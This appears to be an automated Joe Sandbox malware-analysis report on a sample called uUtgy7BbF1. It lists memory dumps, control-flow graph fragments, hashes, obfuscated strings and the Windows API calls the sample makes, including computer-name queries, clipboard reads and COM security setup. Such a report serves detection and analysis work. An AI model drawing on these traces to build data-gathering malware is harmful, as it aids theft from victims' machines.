                                                                                  • Opcode Fuzzy Hash: af5b5c8d97ad725f1cba710caa06336f5d4c090d00e4ccb21e8133b60b871a38
                                                                                  • Instruction Fuzzy Hash: 28412435B083514BD328CA3C9C6137BBBE2DBD6311F688A6DE5D1C7799E639C8018709
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7a2e344c5d1edb06f7df8b2f1768e3dea44206ea03c0c1cb075caf44c4f91fa1
                                                                                  • Instruction ID: dc484de900702ea7fd58ce72979cff842d7c41974bd76ae8d50f3999e681b5d9
                                                                                  • Opcode Fuzzy Hash: 7a2e344c5d1edb06f7df8b2f1768e3dea44206ea03c0c1cb075caf44c4f91fa1
                                                                                  • Instruction Fuzzy Hash: AA01DE75A80B108BD7298F24DD6136A77E0EB07304F14806EC592A7780DA7AFD008F99

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 806 4336a0-433739 GetSystemMetrics * 2 810 433740-433af5 806->810
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: MetricsSystem
                                                                                  • String ID: AC$*?C$1$LGC$uDC$zBC$=C
                                                                                  • API String ID: 4116985748-682157884
                                                                                  • Opcode ID: 02bb96d70cd6577b4178e4b39174d52ca7c32edb2cda6836f488a2f11afff723
                                                                                  • Instruction ID: 1998a03cc5df2a2f33f1525dd043022f22112b898c887f3cf15ef20427d46a93
                                                                                  • Opcode Fuzzy Hash: 02bb96d70cd6577b4178e4b39174d52ca7c32edb2cda6836f488a2f11afff723
                                                                                  • Instruction Fuzzy Hash: 979149B011A384CBE774EF11C5597CFBAE1AB82308F11891ED29D4B250DBBA450DDF9A

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1137 4085b0-4085be call 43d1f0 1140 4085c4-4085cb call 435f90 1137->1140 1141 4086d9-4086db ExitProcess 1137->1141 1144 4085d1-4085fa GetCurrentProcessId GetCurrentThreadId SHGetSpecialFolderPathW 1140->1144 1145 4086c2-4086c9 1140->1145 1148 408600-40862e 1144->1148 1146 4086d4 call 43d970 1145->1146 1147 4086cb-4086d1 call 407f80 1145->1147 1146->1141 1147->1146 1148->1148 1150 408630-40865b call 43bd20 1148->1150 1155 408660-40867c 1150->1155 1156 408696-4086b6 GetForegroundWindow call 4098b0 1155->1156 1157 40867e-408694 1155->1157 1156->1145 1160 4086b8 call 40cab0 1156->1160 1157->1155 1162 4086bd call 40b550 1160->1162 1162->1145
                                                                                  APIs
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 004085D1
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 004085D7
                                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004085E8
                                                                                  • GetForegroundWindow.USER32 ref: 0040869C
                                                                                  • ExitProcess.KERNEL32 ref: 004086DB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                  • String ID:
                                                                                  • API String ID: 4063528623-0
                                                                                  • Opcode ID: 749443de202a5043038cf60a811374f411e20320b39cfc084a8cc678c959233e
                                                                                  • Instruction ID: 509b8593f85bca22239e70e965a689bc814e36a94043752a13a9102ecda549f4
                                                                                  • Opcode Fuzzy Hash: 749443de202a5043038cf60a811374f411e20320b39cfc084a8cc678c959233e
                                                                                  • Instruction Fuzzy Hash: BF2168B1E002005BD7147F319D0A72A76959F86705F0A863EECD5BB3E7EE3D8811865E
                                                                                  APIs
                                                                                  • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042BFEB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ComputerName
                                                                                  • String ID: Jk
                                                                                  • API String ID: 3545744682-2435780000
                                                                                  • Opcode ID: e11f0280e5fc73940bd43accc5bac76100360abbb9ea086e8515174c2a2be390
                                                                                  • Instruction ID: f8b6963ffdad34389f8e41c28869e3d9660b03a655e2583e95d8d3bda7f56e74
                                                                                  • Opcode Fuzzy Hash: e11f0280e5fc73940bd43accc5bac76100360abbb9ea086e8515174c2a2be390
                                                                                  • Instruction Fuzzy Hash: 9221253550C7904ADB32CB3998647EBBBE09F97304F094A6DC4DDC7286DB384405CB96
                                                                                  APIs
                                                                                  • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042BFEB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ComputerName
                                                                                  • String ID: Jk
                                                                                  • API String ID: 3545744682-2435780000
                                                                                  • Opcode ID: 7025246bb4045d934add9299956edf933fbae908dc2bfb3c0eeb9ab801584232
                                                                                  • Instruction ID: 1eb15b467228e91927b88c1530aa4184b94cdc4fa3224a7153598cd3ef29f343
                                                                                  • Opcode Fuzzy Hash: 7025246bb4045d934add9299956edf933fbae908dc2bfb3c0eeb9ab801584232
                                                                                  • Instruction Fuzzy Hash: 85113036608B904BDB31CB389C287EBBBD09F96310F194B2DC4DDC7295EB3848018B92
                                                                                  APIs
                                                                                  • GetUserDefaultUILanguage.KERNELBASE ref: 00436A65
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: DefaultLanguageUser
                                                                                  • String ID: u
                                                                                  • API String ID: 95929093-4067256894
                                                                                  • Opcode ID: 3484c23c7cdde163382f8b5677bb3c5e64803b511a88fc23218b33cef870498d
                                                                                  • Instruction ID: f3c22d90c568ecaed0f3cc6f16dafd322a7d18ae38fc015f3be8ab71a63a4f26
                                                                                  • Opcode Fuzzy Hash: 3484c23c7cdde163382f8b5677bb3c5e64803b511a88fc23218b33cef870498d
                                                                                  • Instruction Fuzzy Hash: 29010434C082929FCF119F78C9403EE7FA16F1B310F1986A9C4D567386D7398A058B96
                                                                                  APIs
                                                                                  • CoInitializeEx.OLE32(00000000,00000002), ref: 0040CADA
                                                                                  • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CC22
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: Initialize
                                                                                  • String ID:
                                                                                  • API String ID: 2538663250-0
                                                                                  • Opcode ID: 473d84c0bd29ceff853ded9ea3310dfdb5f52dcc193ba7537c9131df9544d089
                                                                                  • Instruction ID: a48d5ef0adb5250571e8a41bd9df73004e022a6934e4612084ba1943594d6038
                                                                                  • Opcode Fuzzy Hash: 473d84c0bd29ceff853ded9ea3310dfdb5f52dcc193ba7537c9131df9544d089
                                                                                  • Instruction Fuzzy Hash: A741E4B4D10B00AFD370EF39DA4B7127EB4AB05250F404B2DF9EA866D4E631A4198BD7
                                                                                  APIs
                                                                                  • FreeLibrary.KERNEL32(?), ref: 0042BE25
                                                                                  • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042BEC6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ComputerFreeLibraryName
                                                                                  • String ID:
                                                                                  • API String ID: 2904949787-0
                                                                                  • Opcode ID: 1b899856a03afd29ed7c8782b2defd5225d8016c3f33a9f86d38d8b93064c668
                                                                                  • Instruction ID: 4b0124f1363a5f6538044442258c4939d1b124f166065c956affb4ec42b5f0b7
                                                                                  • Opcode Fuzzy Hash: 1b899856a03afd29ed7c8782b2defd5225d8016c3f33a9f86d38d8b93064c668
                                                                                  • Instruction Fuzzy Hash: 7731F53522C3918FD7218B35D8107EBBBE5AF9A314F99486EC1C8D7252DB788806C791
                                                                                  APIs
                                                                                  • FreeLibrary.KERNEL32(?), ref: 0042BE25
                                                                                  • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042BEC6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ComputerFreeLibraryName
                                                                                  • String ID:
                                                                                  • API String ID: 2904949787-0
                                                                                  • Opcode ID: 6620cd2dd9454d8305604dc0a295b7f92df86d05da90940a768b1fd21d37aead
                                                                                  • Instruction ID: b0442a1b6006627bfac749667bf69648ea68c72265edfd0c76de215cb43adc1f
                                                                                  • Opcode Fuzzy Hash: 6620cd2dd9454d8305604dc0a295b7f92df86d05da90940a768b1fd21d37aead
                                                                                  • Instruction Fuzzy Hash: 6A21F8352683918FD721DB35DC107EBBBE6EB9A314F99492ED1C9C7252DB7488028781
                                                                                  APIs
                                                                                  • GetForegroundWindow.USER32 ref: 0043E9A1
                                                                                  • GetForegroundWindow.USER32 ref: 0043E9B3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ForegroundWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2020703349-0
                                                                                  • Opcode ID: 0dea34fee18d2d4d34ccc8698138f7830839b94345d1193dcb1cea91282bf9ce
                                                                                  • Instruction ID: 1f1a92c4ed7c3cabed4fabd3d678f137bf463a9ca5e289bc5fa2f09bb69a997d
                                                                                  • Opcode Fuzzy Hash: 0dea34fee18d2d4d34ccc8698138f7830839b94345d1193dcb1cea91282bf9ce
                                                                                  • Instruction Fuzzy Hash: B7D012B9C000068BDF44DFA0FC8D44E7769BE46619F045035E40343122E93495068B4D
                                                                                  APIs
                                                                                  • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042BEC6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ComputerName
                                                                                  • String ID:
                                                                                  • API String ID: 3545744682-0
                                                                                  • Opcode ID: cd2bccd2bec2de7f05dfec0e84612135ab30a4b4d834837766c462715e607512
                                                                                  • Instruction ID: 2ec592fbdc78758a6a3c226a3e8484dbb67dbcc7126bdc08d1755178837746e5
                                                                                  • Opcode Fuzzy Hash: cd2bccd2bec2de7f05dfec0e84612135ab30a4b4d834837766c462715e607512
                                                                                  • Instruction Fuzzy Hash: 472129352283918FD720DB35DC107EBBBE5EB9A324F994C2EC1C8C7252DB7488028781
                                                                                  APIs
                                                                                  • RtlReAllocateHeap.NTDLL(?,00000000,00439407,01137378,00000000,01137378,00439407,00000000,00004000,?,?,?,?,00000001,01137378,000001EB), ref: 0043D9C2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: 084470b7baac391b38589efddef063322e1089dcf71c2679d93c93680cd862d0
                                                                                  • Instruction ID: b8b631638b18798679597f3341c455e23d05a83346a63bcdeeebd9bf56da5e38
                                                                                  • Opcode Fuzzy Hash: 084470b7baac391b38589efddef063322e1089dcf71c2679d93c93680cd862d0
                                                                                  • Instruction Fuzzy Hash: EFF0277A8582A0FBC6116F25BC02A9B3664EF8F315F01147BF401A6121DB3ADC06D6DF
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: BlanketProxy
                                                                                  • String ID:
                                                                                  • API String ID: 3890896728-0
                                                                                  • Opcode ID: e533b8d7a54d8a619334615e694dd05766154279aca62bc1f98a219380d37df7
                                                                                  • Instruction ID: 24518978adee5ca75fa83efdf11994bb0dab04cffabc163f3a89706635ba24a8
                                                                                  • Opcode Fuzzy Hash: e533b8d7a54d8a619334615e694dd05766154279aca62bc1f98a219380d37df7
                                                                                  • Instruction Fuzzy Hash: 92F0A4B45093518FE321DF25D56974FBBE4BB88348F11891CE8945B291C7B99A488FC2
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: BlanketProxy
                                                                                  • String ID:
                                                                                  • API String ID: 3890896728-0
                                                                                  • Opcode ID: f6c407c80fc0f7406bccacefba9cb4fe8356fce67e48fbcb250bc6c4a1960068
                                                                                  • Instruction ID: a6a0066e54c7d049ab9ba52ee2f517c0d060c6457a62882aa2ba7396dcee3bc7
                                                                                  • Opcode Fuzzy Hash: f6c407c80fc0f7406bccacefba9cb4fe8356fce67e48fbcb250bc6c4a1960068
                                                                                  • Instruction Fuzzy Hash: 2CF07AB45087018FD354DF25D5A875BBBE0FB85304F00881DE5D68B290DBB59A48CF86
                                                                                  APIs
                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CC79
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeSecurity
                                                                                  • String ID:
                                                                                  • API String ID: 640775948-0
                                                                                  • Opcode ID: f26f7e794f68f0bb5a99fe30ccc7342a53b7d5a4afcd2a31ad992c16831d56de
                                                                                  • Instruction ID: 2b78fd6e66c85e2770e1fedaeca4d467f1847f566c0c49e5f6124588b814a6a2
                                                                                  • Opcode Fuzzy Hash: f26f7e794f68f0bb5a99fe30ccc7342a53b7d5a4afcd2a31ad992c16831d56de
                                                                                  • Instruction Fuzzy Hash: C6D092353D83417BF9645B08AD53F1072509746F16F310624B323FE2E5C9906501860C
                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(?,00000000,00000000,004146B4,00000000), ref: 0043BD60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 3298025750-0
                                                                                  • Opcode ID: 8b36816211867e107b1c33e8a36d1a93761f9aace37de06867b51b3c08574d90
                                                                                  • Instruction ID: f90848bae3256b06cf5094926935a10db3a74c04a44cfe7e493f6f0e12b6a334
                                                                                  • Opcode Fuzzy Hash: 8b36816211867e107b1c33e8a36d1a93761f9aace37de06867b51b3c08574d90
                                                                                  • Instruction Fuzzy Hash: 85D0C931465622EBC6146F18BC15BC73A54DF4A361F0708A2F4006A475C675DC91DAE8
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(?,00000000,00408638,?,00408638), ref: 0043BD30
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: cf65f95657680e7bc98513e43210a7ecff9104acca7fedf48e906d763921924d
                                                                                  • Instruction ID: 2c7a29268eac836babc22c216ba9330a039660881ad4ae188c8b4a1fbc13fc40
                                                                                  • Opcode Fuzzy Hash: cf65f95657680e7bc98513e43210a7ecff9104acca7fedf48e906d763921924d
                                                                                  • Instruction Fuzzy Hash: 40C09B31455321EBC6106B15FC05FC77F54DF49751F1140A6B00477072C771AC41C6D8
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                  • String ID: Q$]$e$j$q$x
                                                                                  • API String ID: 2832541153-692368135
                                                                                  • Opcode ID: cd7ee1b0d44008d18f148219d93ad27284650de1e218d48dcbd18ce31904f4f5
                                                                                  • Instruction ID: 6f1dbd0e63c0454490a30a8cba9f540b8e981e08c188719af7d206ff943662a7
                                                                                  • Opcode Fuzzy Hash: cd7ee1b0d44008d18f148219d93ad27284650de1e218d48dcbd18ce31904f4f5
                                                                                  • Instruction Fuzzy Hash: 9B41927150C7418ED310AF78988935FBFE0AB9A315F044A3EE4D5873D2D6788649C75B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: o;i$#C(]$1G#A$3SQm$KJIH$rqB$xlc=
                                                                                  • API String ID: 0-4225912290
                                                                                  • Opcode ID: b291a350f7d21ee5a1b80931a86ef7cb954b4aa59bf97fddcf800b527b295b08
                                                                                  • Instruction ID: 99384cb80079416eac910717a9e1d0dd8795ebf962f0defd3915704c1b902f09
                                                                                  • Opcode Fuzzy Hash: b291a350f7d21ee5a1b80931a86ef7cb954b4aa59bf97fddcf800b527b295b08
                                                                                  • Instruction Fuzzy Hash: 06914876A0C3248BC320DF64E88165FB7E1EBC9704F59493EE98997341DB74AD058BCA
                                                                                  APIs
                                                                                    • Part of subcall function 0043DA10: LdrInitializeThunk.NTDLL(00440D9D,00000002,00000018,?,?,00000018,?,?,?), ref: 0043DA3E
                                                                                  • FreeLibrary.KERNEL32(?), ref: 00419706
                                                                                  • FreeLibrary.KERNEL32(?), ref: 0041976B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLibrary$InitializeThunk
                                                                                  • String ID: 056w$HS$X{$wB
                                                                                  • API String ID: 764372645-2637307891
                                                                                  • Opcode ID: a444461b27d80ad657000d898751c9d626c695014427ae98d874af7b6ceb9ac3
                                                                                  • Instruction ID: 5228fd0e467c720768e27c90b66e3c9c54d982958b1791ede40bd78fdaf92bff
                                                                                  • Opcode Fuzzy Hash: a444461b27d80ad657000d898751c9d626c695014427ae98d874af7b6ceb9ac3
                                                                                  • Instruction Fuzzy Hash: B0821B746483406BE724CF24D8A076BBBE1EBD6714F28892DE0D5473A1D379DC82CB5A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: "ti$"ti
                                                                                  • API String ID: 0-2860212937
                                                                                  • Opcode ID: db70b6725760ee1e7b0c82764c85399648d13b1201e1b058b4d747cb3a019c3f
                                                                                  • Instruction ID: fc7d49635ef18015c822bf88762ae147e97f4ad7372b1f72ebe7aeb326160e87
                                                                                  • Opcode Fuzzy Hash: db70b6725760ee1e7b0c82764c85399648d13b1201e1b058b4d747cb3a019c3f
                                                                                  • Instruction Fuzzy Hash: 7B022D71E002199FDF14DFA9C9846EDB7B2FF48314F248269E519A7380D731AA41CB94
                                                                                  APIs
                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00418272
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnvironmentExpandStrings
                                                                                  • String ID: <9$L$o
                                                                                  • API String ID: 237503144-3122339205
                                                                                  • Opcode ID: f91f0f8c20f7ac1f881b57f9819e89f26c0b09be35d7c1beb1e8172666532097
                                                                                  • Instruction ID: 38d06cfc946e2d634f33bc898b8b3081b8a665a97a1976fa3bc9cb3ab81d6238
                                                                                  • Opcode Fuzzy Hash: f91f0f8c20f7ac1f881b57f9819e89f26c0b09be35d7c1beb1e8172666532097
                                                                                  • Instruction Fuzzy Hash: F6E14B756083528BD320CF29D8D07ABB7E1EF99324F188A3DE4C487391EB789945CB56
                                                                                  APIs
                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,59195F3A,00000000,00000000,?), ref: 004181F4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnvironmentExpandStrings
                                                                                  • String ID: M+O$!C-M$7imJ$}Y*[$qWs
                                                                                  • API String ID: 237503144-2509796657
                                                                                  • Opcode ID: 47ed97315e110507114ef7b549b792d0a16ca60f33f0bbd43ba62459c0688936
                                                                                  • Instruction ID: 249fc3654da106cc027156d5fad6694f65c71858bdaf82a4f9d6bcb215be2f5f
                                                                                  • Opcode Fuzzy Hash: 47ed97315e110507114ef7b549b792d0a16ca60f33f0bbd43ba62459c0688936
                                                                                  • Instruction Fuzzy Hash: 3F9116716183128BC324CF14C4916BBB7F1EFC9764F199A1EE5CA5B361E7389881C74A
                                                                                  APIs
                                                                                    • Part of subcall function 0068AFB3: GetLastError.KERNEL32(00000000,?,0068D392,?,?,?,00000000), ref: 0068AFB7
                                                                                    • Part of subcall function 0068AFB3: SetLastError.KERNEL32(00000000,?,?,?,00000000,?,FFFFFFFF,000000FF,?,?,?,00000000), ref: 0068B059
                                                                                  • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 0069016A
                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 006901A8
                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 006901BB
                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00690203
                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0069021E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
